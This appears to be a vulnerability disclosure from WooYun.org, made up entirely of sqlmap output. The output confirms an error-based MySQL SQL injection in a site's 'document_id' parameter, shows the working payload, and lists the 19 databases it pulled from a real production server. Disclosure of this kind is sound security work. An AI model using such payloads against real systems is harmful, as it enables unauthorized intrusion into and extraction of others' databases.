WooYun.org

GET parameter 'document_id' is vulnerable. Do you want to keep testing the other
s (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 2105 HTTP(s)
requests:
---
Parameter: document_id (GET)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: document_id=-5706 OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE W
HEN (3039=3039) THEN 1 ELSE 0 END)),0x7176767071,FLOOR(RAND(0)*2)) HAVING MIN(0)
#
---
[15:43:15] [INFO] testing MySQL
[15:43:24] [INFO] confirming MySQL
[15:43:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[15:43:24] [INFO] fetching database names
[15:43:25] [INFO] the SQL query used returns 19 entries
[15:43:25] [INFO] retrieved: information_schema
[15:43:25] [INFO] retrieved: cnmo_active
[15:43:25] [INFO] retrieved: cnmo_dealer
[15:43:25] [INFO] retrieved: cnmo_dealer_counter
[15:43:25] [INFO] retrieved: cnmo_mall
[15:43:26] [INFO] retrieved: cnmo_new_stats
[15:43:26] [INFO] retrieved: cnmo_picture
[15:43:26] [INFO] retrieved: cnmo_product
[15:43:26] [INFO] retrieved: cnmo_s
[15:43:26] [INFO] retrieved: cnmo_stat_hits
[15:43:26] [INFO] retrieved: cnmo_tihuobao
[15:43:27] [INFO] retrieved: cnmo_zoldb
[15:43:27] [INFO] retrieved: mysql
[15:43:27] [INFO] retrieved: new_article
[15:43:27] [INFO] retrieved: new_comment
[15:43:27] [INFO] retrieved: new_plugin
[15:43:57] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request
[15:44:31] [INFO] retrieved: new_power
[15:44:31] [INFO] retrieved: substation_admin_power
[15:44:31] [INFO] retrieved: test
available databases [19]:
[*] cnmo_active
[*] cnmo_dealer
[*] cnmo_dealer_counter
[*] cnmo_mall
[*] cnmo_new_stats
[*] cnmo_picture
[*] cnmo_product
[*] cnmo_s
[*] cnmo_stat_hits
[*] cnmo_tihuobao
[*] cnmo_zoldb
[*] information_schema
[*] mysql
[*] new_article
[*] new_comment
[*] new_plugin
[*] new_power
[*] substation_admin_power
[*] test